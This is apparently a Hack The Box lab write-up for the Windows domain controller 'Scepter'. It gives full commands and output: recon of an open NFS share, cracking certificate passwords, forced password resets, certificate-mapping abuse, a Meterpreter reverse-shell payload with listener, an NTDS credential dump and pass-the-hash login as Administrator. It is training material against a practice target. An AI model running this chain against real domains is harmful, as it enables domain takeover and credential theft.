Scepter
https://app.hackthebox.com/machines/Scepter
Last updated
https://app.hackthebox.com/machines/Scepter
Last updated
Using the htbscan from
[+] Starting recon on 10.10.11.65 (scepter)
[*] Running initial Nmap scan...
sudo nmap -sCV -T4 10.10.11.65 -oA nmap-initial
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-04 21:26 CEST
Nmap scan report for 10.10.11.65
Host is up (0.020s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-05 03:28:13Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-05-05T03:29:03+00:00; +8h01m26s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-05T03:29:03+00:00; +8h01m26s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T00:21:41
|_Not valid after: 2025-11-01T00:41:41
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Adding the domain-controller to our hosts as well.(The latest version of htbscan should do this as well)
<machineip> scepter.htb dc01.scepter.htbWe find some certificates on that NFS Server and a key as well. Mount it to /tmp
â showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)
â mkdir nfs
â sudo mount -t nfs 10.10.11.65:/helpdesk nfs
â sudo ls -lha nfs
total 21K
drwx------ 2 4294967294 4294967294 64 Nov 2 2024 .
drwx------ 2 4294967294 4294967294 64 Nov 2 2024 ..
-rwx------ 1 4294967294 4294967294 2.5K Nov 2 2024 baker.crt
-rwx------ 1 4294967294 4294967294 2.0K Nov 2 2024 baker.key
-rwx------ 1 4294967294 4294967294 3.3K Nov 2 2024 clark.pfx
-rwx------ 1 4294967294 4294967294 3.3K Nov 2 2024 lewis.pfx
-rwx------ 1 4294967294 4294967294 3.3K Nov 2 2024 scott.pfx
We gonna try to crack these certificates using john
â scepter sudo pfx2john nfs/lewis.pfx | tee -a helpdesk/lewishash
lewis.pfx:$pfxng$256$32$2048$8$2ae7b9f39c9e4fb3$30820c8e308206fa06092a86<snipped>
â scepter john --wordlist=/usr/share/wordlists/rockyou.txt helpdesk/lewishash
[...]
newpassword (lewis.pfx) With that password we are able to generate a pfx for baker without any password, just hit enter. Moreover changing owner- and groupchip.
â sudo openssl pkcs12 -export -out baker.pfx -inkey nfs/baker.key -in nfs/baker.crt -passin pass:newpassword
Enter Export Password:
Verifying - Enter Export Password:
â sudo chown kali:kali baker.pfx Syncing our clock(not necessary needed twice) and getting the cert.
â sudo ntpdate 10.10.11.65
â sudo ntpdate 10.10.11.65 | certipy-ad auth -pfx baker.pfx -dc-ip 10.10.11.65
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: d.baker@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce
Now we ned to add the domain-controller to our resolver and using the hash with bloodhound to get some overview how we can escalate further
nameserver 10.10.11.65[domain_realm]
.scepter.htb = SCEPTER.HTB
scepter.htb = SCEPTER.HTB
[libdefaults]
default_realm = SCEPTER.HTB
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 24h
forwardable = true
[realms]
SCEPTER.HTB = {
kdc = dc01.scepter.htb
admin_server = dc01.scepter.htb
default_domain = scepter.htbâ sudo bloodhound-python -u 'd.baker' --hashes 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d scepter.htb -dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 04S
INFO: Compressing output into 20250508084312_bloodhound.zip
If you haven't installed it already here are the steps:
â sudo apt -y install bloodhound â
Installing: â
bloodhound â
â
Installing dependencies: â
binfmt-support fastjar jarwrapper neo4j
Starting neo4j then open the link and change the password. Afterwards we start bloodhound in a new terminal and just dropping our zip-file. When th eimport is done we can use the search
â sudo neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
[..]
2025-05-08 06:55:32.179+0000 INFO Bolt enabled on localhost:7687.
2025-05-08 06:55:32.856+0000 INFO Remote interface available at http://localhost:7474/
[open browser and change password]â bloodhound
[drop zip-file into bloodhound]When we enter the User Baker at search, select him and check shortest path
After this we gonna check these nodes, when we right click Carter we see some interesting action "ForceChangePassword"
So let's do this.
â impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
New password: Password123
Retype new password: Password123
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
Another bloodhound check with these new credentials and user
â sudo bloodhound-python -u 'a.carter' -p 'Password123' -d scepter.htb -dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 08S
INFO: Compressing output into 20250508083614_bloodhound.zipWe are now in a group called staff access certificate
â scepter impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
New password:
Retype new password:
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
â scepter sudo ntpdate 10.10.11.65 | impacket-getTGT -no-Password123 -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
usage: getTGT.py [-h] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-service SPN] [-principalType [PRINCIPALTYPE]] identity
getTGT.py: error: unrecognized arguments: -no-Password123
â scepter sudo ntpdate 10.10.11.65 | impacket-getTGT -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in d.baker@dc01.scepter.htb.ccache
â scepter export KRB5CCNAME=d.baker@dc01.scepter.htb.ccache
â scepter sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123
[+] Password changed successfully!
â scepter sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB
â scepter sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepter.htb
[+] d.baker's mail has been updated
â scepter sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
â scepter sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'
â scepter sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
â scepter sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: h.brown@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
â scepter export KRB5CCNAME=./h.brown.ccache
â scepter sudo ntpdate -u 10.10.11.65
2025-05-15 01:21:51.653867 (+0200) +28798.893693 +/- 0.009609 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28798.893693
â scepter evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brown
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.brown\Documents>
Enter password 'Password123' at the beginning
impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
sudo ntpdate 10.10.11.65 | impacket-getTGT -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb
export KRB5CCNAME=d.baker@dc01.scepter.htb.ccache
sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123
sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepter.htb
sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown
export KRB5CCNAME=./h.brown.ccache
sudo ntpdate -u 10.10.11.65
evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brownGetting a stable meterpreter-sesssion. Creatin our payload with msfvenom, starting our listener in metesploit.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4243 -f exe -o shell.exe
â scepter msfconsole
Metasploit tip: Use the analyze command to suggest runnable modules for
hosts
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.4.50-dev ]
+ -- --=[ 2496 exploits - 1283 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 4243
lport => 4243
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run -jUploading our payload and executing it
*Evil-WinRM* PS C:\Users\h.brown\Downloads> upload shell.exe
Info: Uploading /mnt/e/hacking/hackthebox/Machines/scepter/shell.exe to C:\Users\h.brown\Downloads\shell.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\h.brown\Downloads> ./shell.exe
*Evil-WinRM* PS C:\Users\h.brown\Downloads> msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows SCEPTER\h.brown @ DC01 <ip>:4243 -> 10.10.11.65:52384 (10.10.11.65)
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Creating a new computer and analyzing the x509
â sudo ntpdate -u 10.10.11.65 | bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p 'Password123' --dc-ip 10.10.11.65 add computer meow 'Password123'
[+] meow created
â certipy-ad req -ca scepter-DC01-CA -template Machine -target 10.10.11.65 -username meow$ -password 'Password123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with DNS Host Name 'meow.scepter.htb'
[*] Certificate object SID is 'S-1-5-21-74879546-916818434-740295365-9102'
[*] Saved certificate and private key to 'meow.pfx'
â certipy-ad cert -pfx meow.pfx -nokey -out "meow.crt"
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'meow.crt'
â openssl x509 -in meow.crt -noout -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: DC=htb, DC=scepter, CN=scepter-DC01-CA
[...] Adding meow.scepter.htb to our hosts-file
# conv.py
import sys
from binascii import unhexlify
def parse_serial(hex_serial):
# remove colons and reverse byte order
hex_serial = hex_serial.replace(":", "")
bytes_reversed = [hex_serial[i:i+2] for i in range(0, len(hex_serial), 2)][::-1]
return ''.join(bytes_reversed).lower()
def format_altsecid(issuer, serial):
issuer_parts = issuer.split(',')
issuer_parts = [p.strip() for p in issuer_parts[::-1]]
issuer_formatted = ','.join(issuer_parts)
return f'X509:<I>{issuer_formatted}<SR>{parse_serial(serial)}'
if __name__ == "__main__":
serial = sys.argv[sys.argv.index("-serial")+1]
issuer = sys.argv[sys.argv.index("-issuer")+1]
print(format_altsecid(issuer, serial))
â python3 conv.py -serial '62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e' -issuer 'CN=scepter-DC01-CA,DC=scepter,DC=htb'
X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 4992 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7136]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\h.brown\Downloads>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\h.brown\Downloads> $map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062'
$map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062'
PS C:\Users\h.brown\Downloads> Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}
Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}â sudo ntpdate -u 10.10.11.65
2025-05-15 02:12:39.713454 (+0200) +28798.933465 +/- 0.009446 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28798.933465
â sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx meow.pfx -dc-ip 10.10.11.65 -username p.adams
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] The provided username does not match the identification found in the provided certificate: 'P.ADAMS' - 'meow$'
Do you want to continue? (Y/n) [*] Using principal: p.adams@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0
â python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0 scepter.htb/p.adams@10.10.11.65
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:cc5d676d45f8287aef2f1abcd65213d9575c86c54c9b1977935983e28348bcd5
Administrator:aes128-cts-hmac-sha1-96:bb557b22bad08c219ce7425f2fe0b70c
Administrator:des-cbc-md5:f79d45bf688aa238
krbtgt:aes256-cts-hmac-sha1-96:5d62c1b68af2bb009bb4875327edd5e4065ef2bf08e38c4ea0e609406d6279ee
krbtgt:aes128-cts-hmac-sha1-96:b9bc4dc299fe99a4e086bbf2110ad676
krbtgt:des-cbc-md5:57f8ef4f4c7f6245
scepter.htb\d.baker:aes256-cts-hmac-sha1-96:6adbc9de0cb3fb631434e513b1b282970fdc3ca089181991fb7036a05c6212fb
scepter.htb\d.baker:aes128-cts-hmac-sha1-96:eb3e28d1b99120b4f642419c99a7ac19
scepter.htb\d.baker:des-cbc-md5:2fce8a3426c8c2c1
scepter.htb\a.carter:aes256-cts-hmac-sha1-96:5a793dad7f782356cb6a741fe73ddd650ca054870f0c6d70fadcae162a389a71
scepter.htb\a.carter:aes128-cts-hmac-sha1-96:f7643849c000f5a7a6bd5c88c4724afd
scepter.htb\a.carter:des-cbc-md5:d607b098cb5e679b
scepter.htb\h.brown:aes256-cts-hmac-sha1-96:5779e2a207a7c94d20be1a105bed84e3b691a5f2890a7775d8f036741dadbc02
scepter.htb\h.brown:aes128-cts-hmac-sha1-96:1345228e68dce06f6109d4d64409007d
scepter.htb\h.brown:des-cbc-md5:6e6dd30151cb58c7
scepter.htb\p.adams:aes256-cts-hmac-sha1-96:0fa360ee62cb0e7ba851fce9fd982382c049ba3b6224cceb2abd2628c310c22f
scepter.htb\p.adams:aes128-cts-hmac-sha1-96:85462bdef70af52770b2260963e7b39f
scepter.htb\p.adams:des-cbc-md5:f7a26e794949fd61
scepter.htb\e.lewis:aes256-cts-hmac-sha1-96:1cfd55c20eadbaf4b8183c302a55c459a2235b88540ccd75419d430e049a4a2b
scepter.htb\e.lewis:aes128-cts-hmac-sha1-96:a8641db596e1d26b6a6943fc7a9e4bea
scepter.htb\e.lewis:des-cbc-md5:57e9291aad91fe7f
scepter.htb\o.scott:aes256-cts-hmac-sha1-96:4fe8037a8176334ebce849d546e826a1248c01e9da42bcbd13031b28ddf26f25
scepter.htb\o.scott:aes128-cts-hmac-sha1-96:37f1bd1cb49c4923da5fc82b347a25eb
scepter.htb\o.scott:des-cbc-md5:e329e37fda6e0df7
scepter.htb\M.clark:aes256-cts-hmac-sha1-96:a0890aa7efc9a1a14f67158292a18ff4ca139d674065e0e4417c90e5a878ebe0
scepter.htb\M.clark:aes128-cts-hmac-sha1-96:84993bbad33c139287239015be840598
scepter.htb\M.clark:des-cbc-md5:4c7f5dfbdcadba94
DC01$:aes256-cts-hmac-sha1-96:4da645efa2717daf52672afe81afb3dc8952aad72fc96de3a9feff0d6cce71e1
DC01$:aes128-cts-hmac-sha1-96:a9f8923d526f6437f5ed343efab8f77a
DC01$:des-cbc-md5:d6923e61a83d51ef
[*] Cleaning up...
[*] Cleaning up...
â evil-winrm -i scepter.htb -u administrator -H a291ead3493f9773dc615e66c2ea21c4
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cb7063f998324a7fe9d129f6f6db3d32
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Checking our results with for kali.
